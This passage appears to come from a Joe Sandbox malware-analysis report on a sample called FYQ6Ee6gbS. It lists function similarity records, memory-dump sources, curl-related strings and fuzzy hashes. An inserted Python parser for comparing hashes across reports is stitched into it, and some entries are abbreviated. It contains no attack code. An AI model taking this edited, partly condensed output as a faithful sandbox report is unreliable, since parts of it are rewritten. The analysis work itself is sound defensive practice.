                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$@$gfff$gfff
                                          • API String ID: 0-2633265772
                                          • Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                          • Instruction ID: afdbadf8ad454aea10262ed98532b1e3f28973344d9d9fd5f0e0c9be0e1c67ce
                                          • Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
                                          • Instruction Fuzzy Hash: 3BD19D71A087068BD714DE29C48435EBFE2BFC6344F18C92DE8998B356E770DD498B92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %$&$urlapi.c
                                          • API String ID: 0-3891957821
                                          • Opcode ID: d54cafe4cc92266663c0ee85b3b015db8b24651da736ce30b1828b53084893db
                                          • Instruction ID: b49499fc49b5b166c01a9ef21cde474c1202683aea4c34069879cb497c3fae8e
                                          • Opcode Fuzzy Hash: d54cafe4cc92266663c0ee85b3b015db8b24651da736ce30b1828b53084893db
                                          • Instruction Fuzzy Hash: 6422AFA0A383425BEB2C8E209C5973A77D59B93314F14452DEC8A462C3FA7DD8788B53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $
                                          • API String ID: 0-227171996
                                          • Opcode ID: 1294ac3394765b4579edb534827bf978e61e7dc79c815ec7dd42b14a33257f14
                                          • Instruction ID: edbe33a49b6fe232467752d04613a1194340f889a9b48bcf562526900f6e2190
                                          • Opcode Fuzzy Hash: 1294ac3394765b4579edb534827bf978e61e7dc79c815ec7dd42b14a33257f14
                                          • Instruction Fuzzy Hash: 56E220B1A083828FD720DF29C58479AFBE0BB88744F158D1DE89997361E775E844CF92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                          • API String ID: 0-424504254
                                          • Opcode ID: 9e7b2e041a64868022bab46e0922291a07e2f78d913133b2b0037f42e9e7c818
                                          • Instruction ID: 78ceeacb1aa9ab2a14a9939653d273d60132a4d1d0f9c0012e9bb7d00bc4235d
                                          • Opcode Fuzzy Hash: 9e7b2e041a64868022bab46e0922291a07e2f78d913133b2b0037f42e9e7c818
                                          • Instruction Fuzzy Hash: 35315862F287529BD72E1D3CAC85B357A815FD1318F1C037CE885872D2F6598C20C691
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$4
                                          • API String ID: 0-353776824
                                          • Opcode ID: 57abf0afebcd799f4f5bfb2942c3c8e1e408aff5bc92ae84ff04ad923638ee6b
                                          • Instruction ID: 4341d3bd1fa2569c9345dc3344026db3c83750e0ca75c4ee6e049566af5040ad
                                          • Opcode Fuzzy Hash: 57abf0afebcd799f4f5bfb2942c3c8e1e408aff5bc92ae84ff04ad923638ee6b
                                          • Instruction Fuzzy Hash: 6B22E3355087428FCB14DF28C8806BAFBE4FF85318F148A2DE89997391D774AC85CB96
                                          Memory Dump Source
                                          • Source File: 00000001.00000003.1553449105.000000000154F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0154F000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_3_14f2000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35bea76c6e50aeb8727f1e69ddf896f99b4802b02a81613fdbdf6a265b252dc2
                                          • Instruction ID: 2e7865fd4b54a3e1b1938a038dd780c81f0eab29fc1aefa1b3055cae751dd70e
                                          • Opcode Fuzzy Hash: 35bea76c6e50aeb8727f1e69ddf896f99b4802b02a81613fdbdf6a265b252dc2
                                          • Instruction Fuzzy Hash: 0F223FA255E7C11FDB1387744D798A9BF746E1712431E8ACFC4C58F8A3E208980AD7A7
                                          Memory Dump Source
                                          • Source File: 00000001.00000003.1553449105.000000000154F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0155D000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_3_14f2000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35bea76c6e50aeb8727f1e69ddf896f99b4802b02a81613fdbdf6a265b252dc2
                                          • Instruction ID: 2e7865fd4b54a3e1b1938a038dd780c81f0eab29fc1aefa1b3055cae751dd70e
                                          • Opcode Fuzzy Hash: 35bea76c6e50aeb8727f1e69ddf896f99b4802b02a81613fdbdf6a265b252dc2
                                          • Instruction Fuzzy Hash: 0F223FA255E7C11FDB1387744D798A9BF746E1712431E8ACFC4C58F8A3E208980AD7A7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$4
                                          • API String ID: 0-353776824
                                          • Opcode ID: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                          • Instruction ID: 3c0a5611b9d041ac0e961bb5c799be61fce032f4b7b4263886cce816e5f83562
                                          • Opcode Fuzzy Hash: 8c6442ad21fd0c17796323fa4a97b6694f938926aff987d17d07e0839adae3a5
                                          • Instruction Fuzzy Hash: 1512F532A087118BCB24CF18C4847ABBBE5FFD4318F198A7DE89957391D7749884CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H$xn--
                                          • API String ID: 0-4022323365
                                          • Opcode ID: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                          • Instruction ID: c71c1a3a1c34b79930db259462083267bd267c2f6988fb8a091bcda065e3b5cc
                                          • Opcode Fuzzy Hash: ba98885c81f7fa494bdd5047c8f455d032313bc0cf9080200a00e0465fad2ffd
                                          • Instruction Fuzzy Hash: 4EE12631A087158FD718DE68D8C072EBBD2BBC6314F188A3DE99687381E7B4DC058B52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587341516.000000000087C000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587813177.000000000087F000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000881000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000A00000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1B000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000B1E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000BFD000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C09000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1587827437.0000000000C17000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588084641.0000000000C18000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588196734.0000000000DD2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Downgrades to HTTP/1.1$multi.c
                                          • API String ID: 0-3089350377
                                          • Opcode ID: 8ed118774f7067fc68b1c894384e186ed6556be15e86dd7d8558b45e3d6bdd3a
                                          • Instruction ID: ad51b241291f84d5d4049820b22eb061d680b7828740c455e9568c3d4abedf5d
                                          • Opcode Fuzzy Hash: 8ed118774f7067fc68b1c894384e186ed6556be15e86dd7d8558b45e3d6bdd3a
                                          • Instruction Fuzzy Hash: 92C106F1A24302ABD7109F64D88176BB7E1BF95704F04593DF84857292E7B0E978CB92
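The entries above are Joe Sandbox's per-function Similarity records: the memory region the function was lifted from, the strings it references (joined with "$"), and opcode/instruction fuzzy hashes. When you have several of these reports, the practical question is which functions recur across samples and which strings they touch. The following parser is an added example, not Joe Sandbox's own code or API; it assumes only the plain-text layout visible on this page. It turns the blocks into records, strips the "Download File" link residue from the associated-dump lines, splits the "$"-joined String ID, and intersects instruction fuzzy hashes between two parsed reports to surface functions that are candidates for shared code (an exact-hash match, not Joe Sandbox's own similarity scoring). The sample input is constructed from entries on this page with the associated-dump lists shortened.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed sample: two Similarity blocks in this report's plain-text layout.
# Identifiers are copied from the page; the associated-dump lists are shortened,
# and "Download File" is the link residue the extracted page carries.
SAMPLE = """\
Strings
Memory Dump Source
• Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
• Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000001.00000002.1587341516.0000000000713000.00000040.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000001.00000002.1588216914.0000000000DD4000.00000080.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
Similarity
• API ID:
• String ID: Downgrades to HTTP/1.1$multi.c
• API String ID: 0-3089350377
• Opcode ID: 8ed118774f7067fc68b1c894384e186ed6556be15e86dd7d8558b45e3d6bdd3a
• Instruction ID: ad51b241291f84d5d4049820b22eb061d680b7828740c455e9568c3d4abedf5d
• Opcode Fuzzy Hash: 8ed118774f7067fc68b1c894384e186ed6556be15e86dd7d8558b45e3d6bdd3a
• Instruction Fuzzy Hash: 92C106F1A24302ABD7109F64D88176BB7E1BF95704F04593DF84857292E7B0E978CB92
Strings
Memory Dump Source
• Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
• Associated: 00000001.00000002.1587318647.0000000000220000.00000004.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
Similarity
• API ID:
• String ID: curl
• API String ID: 0-65018701
• Opcode ID: 7ba1155c36760892cef9b53cccb5619d14b5703ba9dbb72d1b1cb061cf0bf736
• Instruction ID: db8ead0afc885d1000e57ff6581524c9caa70cd7d73efe26a9cad15a0c7270b5
• Opcode Fuzzy Hash: 7ba1155c36760892cef9b53cccb5619d14b5703ba9dbb72d1b1cb061cf0bf736
• Instruction Fuzzy Hash: 1861B6B18187459BD721DF14C885BEBB7E8BF99304F04962DFD488B212EB31E698C752
"""

# "Source File: <dump>, Offset: <hex>, based on PE: <bool>" as it appears on the page
_SOURCE_RE = re.compile(
    r"^(?P<file>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (?P<pe>\w+)$"
)
_LINK_RESIDUE = "Download File"  # trailing link text left behind by page extraction


@dataclass
class FunctionRecord:
    fields: Dict[str, str] = field(default_factory=dict)  # "Key": "value" pairs of one block
    associated: List[str] = field(default_factory=list)   # associated .sdmp regions, residue stripped

    @property
    def strings(self) -> List[str]:
        # Joe Sandbox joins the strings a function references with "$"
        sid = self.fields.get("String ID", "")
        return [s for s in sid.split("$") if s]

    @property
    def instruction_fuzzy(self) -> str:
        return self.fields.get("Instruction Fuzzy Hash", "")


def parse_similarity_blocks(text: str) -> List[FunctionRecord]:
    """Split report text into one FunctionRecord per 'Memory Dump Source' block."""
    records: List[FunctionRecord] = []
    cur = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Memory Dump Source":  # every block starts with this heading
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue  # section labels such as "Strings", "Similarity", "Joe Sandbox IDA Plugin"
        key, _, value = line.lstrip("•").strip().partition(":")
        key, value = key.strip(), value.strip()
        if key == "Associated":
            if value.endswith(_LINK_RESIDUE):
                value = value[: -len(_LINK_RESIDUE)]
            cur.associated.append(value)
        elif key == "Source File" and (m := _SOURCE_RE.match(value)):
            cur.fields["Source File"] = m.group("file")
            cur.fields["Offset"] = m.group("offset")
            cur.fields["Based on PE"] = m.group("pe")
        else:
            cur.fields[key] = value
    return records


def index_by_fuzzy_hash(records: List[FunctionRecord]) -> Dict[str, List[FunctionRecord]]:
    """Map each instruction fuzzy hash to the records carrying it."""
    idx: Dict[str, List[FunctionRecord]] = {}
    for r in records:
        if r.instruction_fuzzy:
            idx.setdefault(r.instruction_fuzzy, []).append(r)
    return idx


def shared_fuzzy_hashes(a: List[FunctionRecord], b: List[FunctionRecord]) -> Set[str]:
    """Instruction fuzzy hashes present in both reports: candidate shared code."""
    return set(index_by_fuzzy_hash(a)) & set(index_by_fuzzy_hash(b))


if __name__ == "__main__":
    for rec in parse_similarity_blocks(SAMPLE):
        print(rec.fields["Offset"], rec.instruction_fuzzy[:16], rec.strings, len(rec.associated))
```

Feed each report's Similarity section to `parse_similarity_blocks`, then `shared_fuzzy_hashes` across two samples gives the functions worth diffing first; the `strings` property is what lets you spot library code quickly (here "multi.c" and "curl" next to "Downgrades to HTTP/1.1").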
                                           Strings
                                           Memory Dump Source
                                           • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: the same 15 .sdmp regions (00000001.00000002.1587318647.0000000000220000 through 00000001.00000002.1588216914.0000000000DD4000) listed under the first Memory Dump Source entry above
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: M 0.$NT L
                                          • API String ID: 0-1807112707
                                          • Opcode ID: ea623195aeec7946299e8821665d2ceaec95e26b622128c6ac50ab8458243a0f
                                          • Instruction ID: 860000fe42e7b0a75584875de4d9c6800a170c711eb064ad145cb36c346d44a1
                                          • Opcode Fuzzy Hash: ea623195aeec7946299e8821665d2ceaec95e26b622128c6ac50ab8458243a0f
                                          • Instruction Fuzzy Hash: 7B512B786213019BEB11DF20C88475AB3F4BF48304F18856AFC485F292E775DAA4DB56
                                           Strings
                                           Memory Dump Source
                                           • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: the same 15 .sdmp regions (00000001.00000002.1587318647.0000000000220000 through 00000001.00000002.1588216914.0000000000DD4000) listed under the first Memory Dump Source entry above
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: M(
                                          • API String ID: 0-2488470830
                                          • Opcode ID: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                          • Instruction ID: fe4872454ae6d24f1602b6ff32cb125f99d9d829039d4b60f5ca8d908464435f
                                          • Opcode Fuzzy Hash: d9e1dffb9c167f2a1bfd412aa57ca9546c7a865265bd6293c312d3add4af8ce4
                                          • Instruction Fuzzy Hash: 142264735417044BE318CF2FCC81582B3E3AFD822475F857EC926CB696EEB9A61B4548
                                           Strings
                                           Memory Dump Source
                                           • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: the same 15 .sdmp regions (00000001.00000002.1587318647.0000000000220000 through 00000001.00000002.1588216914.0000000000DD4000) listed under the first Memory Dump Source entry above
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D
                                          • API String ID: 0-2746444292
                                          • Opcode ID: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                          • Instruction ID: a269a26a18886ebb0fd96d2a2ba50d4fdede52568ce5e71722a2a2d5deb4f9cb
                                          • Opcode Fuzzy Hash: abc93120844dcb078d04df584af388602c4da3052e158adea212c8b27998d9d7
                                          • Instruction Fuzzy Hash: 43326B7290C3458BC325EF28D4806AEFBE1FFD9304F558A2DE9D963251DB30A945CB82
                                           Strings
                                           Memory Dump Source
                                           • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: the same 15 .sdmp regions (00000001.00000002.1587318647.0000000000220000 through 00000001.00000002.1588216914.0000000000DD4000) listed under the first Memory Dump Source entry above
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H
                                          • API String ID: 0-2852464175
                                          • Opcode ID: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                          • Instruction ID: 39756070558cb6662fca77d516b896a8d4c597b10c940f60495b807c89c5ef85
                                          • Opcode Fuzzy Hash: c78799917f98244fbbae6f37633f6a1f8a0cae5fc04d8ad02d72ec245ffb64b6
                                          • Instruction Fuzzy Hash: ED91D6317182158FCB18CE1CC8D053EF3E3ABC9354F1A857DDA9A97382DA31AC568B85
                                           Strings
                                           Memory Dump Source
                                           • Source File: 00000001.00000002.1587341516.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                           • Associated: the same 15 .sdmp regions (00000001.00000002.1587318647.0000000000220000 through 00000001.00000002.1588216914.0000000000DD4000) listed under the first Memory Dump Source entry above
                                           Joe Sandbox IDA Plugin
                                           • Snapshot File: hcaresult_1_2_220000_FYQ6Ee6gbS.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: curl
                                          • API String ID: 0-65018701
                                          • Opcode ID: 7ba1155c36760892cef9b53cccb5619d14b5703ba9dbb72d1b1cb061cf0bf736
                                          • Instruction ID: db8ead0afc885d1000e57ff6581524c9caa70cd7d73efe26a9cad15a0c7270b5
                                          • Opcode Fuzzy Hash: 7ba1155c36760892cef9b53cccb5619d14b5703ba9dbb72d1b1cb061cf0bf736
                                          • Instruction Fuzzy Hash: 1861B6B18187459BD721DF14C885BEBB7E8BF99304F04962DFD488B212EB31E698C752
                                           Memory Dump Source
